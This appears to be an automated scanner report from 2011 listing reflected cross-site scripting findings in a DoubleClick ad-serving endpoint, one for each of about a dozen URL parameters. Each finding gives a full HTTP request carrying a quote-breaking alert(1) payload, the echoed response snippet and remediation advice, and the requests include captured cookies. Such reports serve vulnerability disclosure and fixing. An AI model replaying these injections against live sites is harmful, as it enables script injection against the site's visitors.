GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.come59bb"-alert(1)-"748ff10e818&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.come59bb"-alert(1)-"748ff10e818&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fsc ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b86ab"-alert(1)-"b7c685bfb49 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2b86ab"-alert(1)-"b7c685bfb49&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... doubleclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2b86ab"-alert(1)-"b7c685bfb49&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t= ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b163"-alert(1)-"c8130219e41 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com6b163"-alert(1)-"c8130219e41&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com6b163"-alert(1)-"c8130219e41&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fscUrl = url; var fscUrlClickTagFound = false; var wmo ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e24"-alert(1)-"07f6af6c04b was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=22e24"-alert(1)-"07f6af6c04b&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=22e24"-alert(1)-"07f6af6c04b&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallow ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2abc"-alert(1)-"1f1d078926c was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=b2abc"-alert(1)-"1f1d078926c&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=b2abc"-alert(1)-"1f1d078926c&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b414a"-alert(1)-"6ba48982fe4 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100b414a"-alert(1)-"6ba48982fe4&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100b414a"-alert(1)-"6ba48982fe4&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.co ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b53b9"-alert(1)-"eff1aa473e was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=b53b9"-alert(1)-"eff1aa473e&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=b53b9"-alert(1)-"eff1aa473e&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fscUrl = url; var fscUrlClickTagF ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a588"-alert(1)-"0710fb18713 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=20009a588"-alert(1)-"0710fb18713&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=20009a588"-alert(1)-"0710fb18713&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/h ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0478"-alert(1)-"ac1775bc225 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243d0478"-alert(1)-"ac1775bc225&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... =cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243d0478"-alert(1)-"ac1775bc225&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dca ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcaf2"-alert(1)-"a1b0ec2d26a was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871fcaf2"-alert(1)-"a1b0ec2d26a&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 7-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871fcaf2"-alert(1)-"a1b0ec2d26a&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_1737753426 ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75677"-alert(1)-"059a0b0bfde was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=51152575677"-alert(1)-"059a0b0bfde&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=51152575677"-alert(1)-"059a0b0bfde&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173. ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 921da"-alert(1)-"2b438c71b84 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189921da"-alert(1)-"2b438c71b84&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
